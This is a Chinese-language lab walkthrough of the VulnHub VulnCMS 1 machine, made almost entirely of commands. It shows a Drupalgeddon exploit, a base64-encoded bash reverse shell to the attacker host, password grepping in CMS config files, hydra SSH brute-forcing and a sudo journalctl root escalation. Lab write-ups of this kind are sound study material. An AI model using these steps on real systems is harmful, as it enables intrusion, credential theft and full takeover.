環境
Kali: 192.168.132.131
靶機:192.168.132.149 靶機地址:https://www.vulnhub.com/entry/vulncms-1,710/
一、資訊收集
nmap -sP 192.168.132.0/24

nmap -p- -sC -sV 192.168.132.149


二、漏洞探測
./droopescan scan drupal -u http://192.168.132.149:9001

通過搜索引擎搜索框架版本的漏洞 Exploit drupal cve 7.54 github
git clone https://github.com/pimps/CVE-2018-7600

三、漏洞驗證
chmod +x http://drupa7-CVE-2018-7600.py
python3 http://drupa7-CVE-2018-7600.py http://192.168.132.149:9001 -c 'id'

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.132.131/4444 <&1'" | base64

rlwrap nc -lvp 4444

python3 drupa7-CVE-2018-7600.py http://192.168.132.149:9001 -c 'echo "YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC4xMzIuMTMxLzQ0NDQgPCYxJwo="| base64 -d |bash'


python3 -c 'import pty; pty.spawn("/bin/bash")'

ls -l
cd sites/default
cat settings.php |grep -i pass

ls -l /home

cd ..
cd wordpress/public_html
cat wp-settings.php |grep -i pass

cd ..
cd joomla/
cat wp-config.php |grep -i pass
cat configuration.php | grep -i pass
cat configuration.php | grep -i user

mysql -u joomla_admin -p

show databases;

show tables;

select * from hs23w_users;

vim user.dict

vim pass.dict

hydra -L user.dict -P pass.dict ssh://192.168.132.149:22 -I -V

ssh [email protected]
python3 -c 'import pty; pty.spawn("/bin/bash")'

cat user.txt

四、提權
提權腳本
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

python3 -m http.server 80

wget http://192.168.132.131/linpeas_base.sh
chmod +x linpeas_base.sh

./linpeas_base.sh > output.txt
cat output.txt |grep -i tyrell

su - tyrell
sudo -l

sudo journalctl
!/bin/bash



五、總結
使用nmap掃描埠等資訊,使用droopescan腳本掃描框架版本,使用瀏覽器搜索該框架版本的漏洞,驗證并利用,獲得web權限的shell,搜集組態檔web用戶的密碼和靶機中用戶名,,通過web登錄mysql,獲得資料庫中密碼,制作用戶名字典和密碼字典,進行ssh破解,獲得elliot用戶的shell,使用linpeas_base.sh腳本搜索靶機中存在用戶的密碼,切換到tyrell,使用sudo提權,獲得root權限,
學到關于cms框架滲透測驗的基本流程,在網上搜索指定版本漏洞的腳本,將執行命令進行base64加密,繞過可能存在過濾,在進行base64解密,執行命令反彈shell,尋找網站組態檔(網站用戶名和密碼可能和系統的用戶名和密碼相同),找到用戶名和密碼,進行ssh爆破,利用提權腳本,尋找pass和指定用戶的密碼資訊,sudo journalctl的提權方法,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302926.html
標籤:其他
上一篇:代碼審計之xhcms環境搭建
